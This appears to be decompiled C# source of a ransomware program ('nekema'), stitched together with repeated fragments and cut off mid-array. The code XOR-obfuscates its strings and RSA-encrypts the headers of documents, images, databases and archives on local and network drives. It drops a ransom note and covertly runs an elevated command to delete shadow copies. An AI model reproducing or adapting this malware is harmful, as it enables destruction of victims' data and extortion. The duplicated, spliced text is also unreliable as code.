0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 230 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe2, 0xe3, 0xf7 }, this.X)); /* * : .cd.ldf .mdf .max .dbf .epf .1cd .md .db .pdf .ppt .xls .doc .arj .tar .7z .rar .zip .tif .jpg .ai .bmp .png .cdr .psd .jpeg .docx .xlsx .pptx .accdb .mdb .rtf .odt .ods .odb .odg .cr2 .nef .nrf .orf .arw .sr2 .srf */ // List<string> list = new List<string>(); Process process = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view", RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { bool flag4; process.Start(); string str4 = process.StandardOutput.ReadToEnd(); int startIndex = 0; int index = 0; goto Label_0A8B; Label_0A48: startIndex = str4.IndexOf('\\', startIndex); if (startIndex == -1) { goto Label_0A98; } index = str4.IndexOf(' ', startIndex); list.Add(str4.Substring(startIndex, index - startIndex)); startIndex = index; Label_0A8B: flag4 = true; goto Label_0A48; } catch { } Label_0A98: num5 = 0; while (num5 < list.Count) { Process process2 = new Process { StartInfo = { FileName = "cmd", Arguments = "/C net view " + list[num5], RedirectStandardOutput = true, UseShellExecute = false, CreateNoWindow = true } }; try { process2.Start(); string s = process2.StandardOutput.ReadToEnd(); byte[] bytes = Encoding.GetEncoding(0x4e3).GetBytes(s); char[] separator = new char[] { '\r', '\n' }; string[] strArray = Encoding.GetEncoding("CP866").GetString(bytes).Split(separator); for (int j = 0; j < strArray.Length; j++) { if (strArray[j].IndexOf("") > -1) { this.FullList.Add(list[num5] + @"\" + strArray[j].Substring(0, strArray[j].IndexOf(""))); } } } catch { } num5++; } /// ...RSA 2048 RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); this.publicKey = provider.ToXmlString(false); // XML this.privateKey = this.CryptKey(provider.ToXmlString(true)); // ... } ///// ssda.far private void SaveKey(string f, string k) { string str = this.keyfile.Substring(0, this.keyfile.Length - 4); if (!File.Exists(f + @"\" + this.keyfile)) { try { File.WriteAllText(f + @"\" + this.keyfile, k); } catch { } } else { try { File.WriteAllText(string.Concat(new object[] { f, @"\", str, this.AmountFiles(f), ".", this.kfExt }), k); } catch { } } } ///// private void SaveNotes() { List<string> list = new List<string> { // Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), // Environment.GetFolderPath(Environment.SpecialFolder.Personal) // }; for (int i = 0; i < list.Count; i++) // { this.SaveKey(list[i], this.privateKey); // ssda.far this.AddNote(list[i]); // } } ///// private void GetDirs(DirectoryInfo pth) { try { DirectoryInfo[] directories = pth.GetDirectories(); foreach (DirectoryInfo info in directories) { this.GetFiles(info); this.GetDirs(info); } } catch { } } ///// private void GetDrives() { try { string[] logicalDrives = Environment.GetLogicalDrives(); for (int i = 0; i < logicalDrives.Length; i++) { DriveInfo info = new DriveInfo(logicalDrives[i]); if ((info.DriveType == DriveType.Fixed) || (info.DriveType == DriveType.Network)) { this.GetDirs(info.RootDirectory); } } } catch { } } //// ... private void GetFiles(DirectoryInfo folder) { try { string[] files = Directory.GetFiles(folder.FullName, "*.*"); foreach (string str in files) { foreach (string str2 in this.extensions) // { if ((str.ToLower().IndexOf(str2) > -1) && (str.ToLower().IndexOf(str2 + ".") == -1)) { string str3 = str; if (str.IndexOf(this.vNF) == -1) { this.CF(str3); /// ... } } } } } catch { } } } } , 0xd7, namespace nekema { public class Form1 : Form { private int blocksize = 0xf5; //245 . private IContainer components = null; private List<string> extensions = new List<string>(); // private List<string> FullList = new List<string>(); // private string keyCode; // . . private string keyfile = ""; // "ssda.far" private string kfExt = ""; // "far" private string kfName = ""; // "ssda" private static readonly int MAX_PATH = 260; // private string pbK = ""; // . private string privateKey = ""; // private string publicKey = ""; // . private int repeatCount = 3; // private List<string> SpecFolders = new List<string>(); private string vNF = ""; // HOW--TO--RETURN--YOUR--FILES.jpg private byte X = 0x91; // // DEXOR = 145 ////// HOW--TO--RETURN--YOUR--FILES.jpg private void AddNote(string f) { string currentDirectory = Environment.CurrentDirectory; if (f != currentDirectory) { try { if (!File.Exists(f + @"\" + this.vNF)) { Resources.ne5.Save(f + @"\" + this.vNF); } } catch { } } } //////// - private void CF(string f1) { byte[] destinationArray = new byte[this.blocksize]; try { byte[] sourceArray = File.ReadAllBytes(f1); if ((sourceArray.Length / (this.repeatCount + 5)) >= this.blocksize) { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.publicKey); byte[] buffer3 = new byte[sourceArray.Length + (this.repeatCount * 11)]; byte[] buffer4 = new byte[sourceArray.Length - (this.repeatCount * this.blocksize)]; for (int i = 0; i < this.repeatCount; i++) { Array.Copy(sourceArray, this.blocksize * i, destinationArray, 0, this.blocksize); byte[] buffer5 = provider.Encrypt(destinationArray, false); Array.Copy(buffer5, 0, buffer3, i * (this.blocksize + 11), buffer5.Length); } Array.Copy(sourceArray, this.repeatCount * this.blocksize, buffer4, 0, buffer4.Length); Array.Copy(buffer4, 0, buffer3, this.repeatCount * (this.blocksize + 11), buffer4.Length); try { File.WriteAllBytes(f1, buffer3); File.Move(f1, f1 + this.keyCode); } catch { } } } catch { } } ////// - private string CryptKey(string s) { string str = ""; byte[] array = new byte[s.Length]; byte[] destinationArray = new byte[this.blocksize]; byte[] bytes = new byte[this.blocksize + 11]; double num = Math.Ceiling((double) (((double) s.Length) / ((double) this.blocksize))); if (s.Length < (num * this.blocksize)) { int length = s.Length; for (int i = 0; i < ((num * this.blocksize) - length); i++) { s = s + " "; } } array = Encoding.Default.GetBytes(s); Array.Reverse(array); try { RSACryptoServiceProvider provider = new RSACryptoServiceProvider(0x800); provider.FromXmlString(this.pbK); for (int j = 0; j < num; j++) { Array.Copy(array, j * this.blocksize, destinationArray, 0, this.blocksize); bytes = provider.Encrypt(destinationArray, false); str = str + Encoding.Default.GetString(bytes); } } catch { } return str; } ///// private void DelS() { byte[] a = new byte[] { 0xe7, 0xe2, 0xe2, 240, 0xf5, 0xfc, 0xf8, 0xff, 0xbf, 0xf4, 0xe9, 0xf4 }; byte[] buffer2 = new byte[] { 0xd5, 0xf4, 0xfd, 0xf4, 0xe5, 0xf4, 0xb1, 0xc2, 0xf9, 240, 0xf5, 0xfe, 230, 0xe2, 0xb1, 190, 0xd0, 0xfd, 0xfd, 0xb1, 190, 0xc0, 0xe4, 0xf8, 0xf4, 0xe5 }; Process process = new Process { StartInfo = { FileName = this.DeXOR(a, this.X), Arguments = this.DeXOR(buffer2, this.X), WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, UseShellExecute = true, Verb = "runas" } }; try { process.Start(); } catch { } } ///// XOR private string DeXOR(byte[] A, int x) { string str = ""; byte[] bytes = new byte[A.Length]; for (int i = 0; i < A.Length; i++) { bytes[i] = (byte) (A[i] ^ x); } return (str = Encoding.Default.GetString(bytes)); } ///// . private void Init() { this.Prep(); // this.SaveNotes(); // this.GetDrives(); // this.NetScan(); // this.SetDesktopWallpaper(); // , } private void Prep() { int num5; // a = ssda.far byte[] a = new byte[] { 0xe2, 0xe2, 0xf5, 240, 0xbf, 0xf7, 240, 0xe3 }; //buffer2 = HOW--TO--RETURN--YOUR--FILES.jpg byte[] buffer2 = new byte[] {0xd9, 0xde, 0xc6, 0xbc, 0xbc, 0xc5, 0xde, 0xbc, 0xbc, 0xc3, 0xd4, 0xc5, 0xc4, 0xc3, 0xdf, 0xbc, 0xbc, 200, 0xde, 0xc4, 0xc3, 0xbc, 0xbc, 0xd7, 0xd8, 0xdd, 0xd4, 0xc2, 0xbf, 0xfb, 0xe1, 0xf6}; //buffer3 = <RSAKeyValue <Modulus>+fFYiO9CH9iZwwzlsQ3X+qZ7Uyx290OhZ1WvLt6cmDd5oRsLoHLnoGws1CWFMOGFjtbaROSkTg3W+72/TjzHkuPp2W/RC7FBC4JpgguCi4x4ye4HEwRkQ75tHhig08hRKm1a7wlwYl8zLAzM8AwTPLh770MOzPqF1fJMKZCAtdUgIKdYNAkrP18sRbshkGNjwjMhMLNbKTaYfo3qIS4vtVUQtcw+g9ys3ZFZetKEl0ZMJEp4X7b4HK9vqUohPBYfBszXY6ion5m5tSSfhJK6OX2HPaU6RDcajTeEcmk9it9x73drJleZ1G+tVgL6duLX/uOWPVyi0rhyvYmRrGNcIQ==</Modulus><Exponent>AQAB</Exponent></RSAKeyValue> byte[] buffer3 = new byte[] { 0xad, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf, 0xad, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xba, 0xf7, 0xd7, 200, 0xf8, 0xde, 0xa8, 210, 0xd9, 0xa8, 0xf8, 0xcb, 230, 230, 0xeb, 0xfd, 0xe2, 0xc0, 0xa2, 0xc9, 0xba, 0xe0, 0xcb, 0xa6, 0xc4, 0xe8, 0xe9, 0xa3, 0xa8, 0xa1, 0xde, 0xf9, 0xcb, 160, 0xc6, 0xe7, 0xdd, 0xe5, 0xa7, 0xf2, 0xfc, 0xd5,0xf5, 0xa4, 0xfe, 0xc3, 0xe2, 0xdd, 0xfe, 0xd9, 0xdd, 0xff, 0xfe, 0xd6, 230, 0xe2, 160, 210,0xc6, 0xd7, 220, 0xde, 0xd6, 0xd7, 0xfb, 0xe5, 0xf3, 240, 0xc3, 0xde, 0xc2, 250, 0xc5, 0xf6, 0xa2, 0xc6, 0xba, 0xa6, 0xa3, 190, 0xc5, 0xfb, 0xeb, 0xd9, 250, 0xe4, 0xc1, 0xe1, 0xa3, 0xc6,190, 0xc3, 210, 0xa6, 0xd7, 0xd3, 210, 0xa5, 0xdb, 0xe1, 0xf6, 0xf6, 0xe4, 210, 0xf8, 0xa5, 0xe9, 0xa5, 0xe8, 0xf4, 0xa5, 0xd9, 0xd4, 230, 0xc3, 250, 0xc0, 0xa6, 0xa4, 0xe5, 0xd9, 0xf9, 0xf8, 0xf6, 0xa1, 0xa9, 0xf9, 0xc3, 0xda, 0xfc, 160, 240, 0xa6, 230, 0xfd, 230, 200, 0xfd, 0xa9, 0xeb, 0xdd, 0xd0, 0xeb, 220, 0xa9, 0xd0, 230, 0xc5, 0xc1, 0xdd, 0xf9, 0xa6, 0xa6, 0xa1, 220, 0xde, 0xeb, 0xc1, 0xe0, 0xd7, 160, 0xf7, 0xdb, 220, 0xda, 0xcb, 210, 0xd0, 0xe5, 0xf5, 0xc4, 0xf6, 0xd8, 0xda, 0xf5, 200, 0xdf, 0xd0, 250, 0xe3, 0xc1, 160, 0xa9, 0xe2, 0xc3, 0xf3, 0xe2, 0xf9, 250, 0xd6, 0xdf, 0xfb, 230, 0xfb, 220, 0xf9, 220, 0xdd, 0xdf, 0xf3, 0xda, 0xc5, 240, 200, 0xf7, 0xfe, 0xa2, 0xe0, 0xd8, 0xc2, 0xa5, 0xe7, 0xe5, 0xc7, 0xc4, 0xc0, 0xe5, 0xf2, 230, 0xba, 0xf6, 0xa8, 0xe8, 0xe2, 0xa2, 0xcb, 0xd7, 0xcb, 0xf4, 0xe5, 0xda, 0xd4, 0xfd, 0xa1, 0xcb, 220, 0xdb, 0xd4, 0xe1, 0xa5, 0xc9, 0xa6, 0xf3, 0xa5, 0xd9, 0xda, 0xa8, 0xe7, 0xe0, 0xc4, 0xfe, 0xf9, 0xc1, 0xd3, 200, 0xf7, 0xd3, 0xe2, 0xeb, 0xc9, 200, 0xa7, 0xf8, 0xfe, 0xff, 0xa4, 0xfc, 0xa4, 0xe5, 0xc2, 0xc2, 0xf7, 0xf9, 0xdb, 0xda, 0xa7, 0xde, 0xc9, 0xa3, 0xd9, 0xc1, 240, 0xc4, 0xa7, 0xc3, 0xd5, 0xf2, 240, 0xfb, 0xc5, 0xf4, 0xd4, 0xf2, 0xfc, 250, 0xa8, 0xf8, 0xe5, 0xa8, 0xe9, 0xa6, 0xa2, 0xf5, 0xe3, 0xdb, 0xfd, 0xf4, 0xcb, 160, 0xd6, 0xba, 0xe5, 0xc7, 0xf6, 0xdd, 0xa7, 0xf5, 0xe4, 0xdd, 0xc9, 190, 0xe4, 0xde, 0xc6, 0xc1, 0xc7, 0xe8, 0xf8, 0xa1, 0xe3, 0xf9, 0xe8, 0xe7, 200, 0xfc, 0xc3, 0xe3, 0xd6, 0xdf, 0xf2, 0xd8, 0xc0, 0xac, 0xac, 0xad, 190, 220, 0xfe, 0xf5, 0xe4, 0xfd, 0xe4, 0xe2, 0xaf, 0xad, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xd0, 0xc0, 0xd0, 0xd3, 0xad, 190, 0xd4, 0xe9, 0xe1, 0xfe, 0xff, 0xf4, 0xff, 0xe5, 0xaf, 0xad, 190, 0xc3, 0xc2, 0xd0, 0xda, 0xf4, 0xe8, 0xc7, 240, 0xfd, 0xe4, 0xf4, 0xaf}; // Windows Vista - . if (Environment.OSVersion.Version.Major > 5) { new Thread(new ThreadStart(this.DelS)).Start(); } // ... this.pbK = this.DeXOR(buffer3, this.X); string str = this.DeXOR(buffer2, this.X); this.vNF = this.DeXOR(buffer2, this.X); this.keyfile = this.DeXOR(a, this.X); this.kfExt = this.RetFExt(this.keyfile); this.kfName = this.RetFName(this.keyfile); this.keyCode = "."; // Random random = new Random(); random.Next(0x61, 0x7a); for (int i = 0; i < 1; i++) { this.keyCode = this.keyCode + Convert.ToChar(random.Next(0x61, 0x7a)).ToString(); } string[] textArray1 = new string[] { this.keyCode, (DateTime.Now.Day + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString(), (DateTime.Now.Month + 10).ToString(), Convert.ToChar(random.Next(0x61, 0x7a)).ToString() }; this.keyCode = string.Concat(textArray1); // ... // ... string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System); folderPath = folderPath.Substring(0, folderPath.ToLower().IndexOf(@"\system")); string str3 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles); this.SpecFolders.Add(folderPath.ToLower()); this.SpecFolders.Add(str3.ToLower()); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xc3 }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xb5, 0xc3, 0xd4, 210, 200, 210, 0xdd, 0xd4, 0xbf, 0xd3, 0xd8, 0xdf }, this.X)); this.SpecFolders.Add(this.DeXOR(new byte[] { 0xc2, 0xe8, 0xe2, 0xe5, 0xf4, 0xfc, 0xb1, 0xc7, 0xfe, 0xfd, 0xe4, 0xfc, 0xf4, 0xb1, 0xd8, 0xff, 0xf7, 0xfe, 0xe3, 0xfc, 240, 0xe5, 0xf8, 0xfe, 0xff }, this.X)); /* ... c:\windows c:\program files (x86) RECYCLER $RECYCLE.BIN System Volume Information */ /// this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfd, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 240, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf4, 0xe1, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 160, 0xf2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xf5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xe3, 0xfb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xa6, 0xeb }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 240, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xeb, 0xf8, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe5, 0xf8, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf8 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf3, 0xfc, 0xe1 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xff, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xf5, 0xe3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe2, 0xf5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfb, 0xe1, 0xf4, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf5, 0xfe, 0xf2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe9, 0xfd, 0xe2, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe1, 0xe1, 0xe5, 0xe9 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 240, 0xf2, 0xf2, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfc, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xe3, 0xe5, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe5 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xe2 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xf5, 0xf6 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xf2, 0xe3, 0xa3 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xf4, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xff, 0xe3, 0xf7 }, this.X)); this.extensions.Add(this.DeXOR(new byte[] { 0xbf, 0xfe, 0xe3, 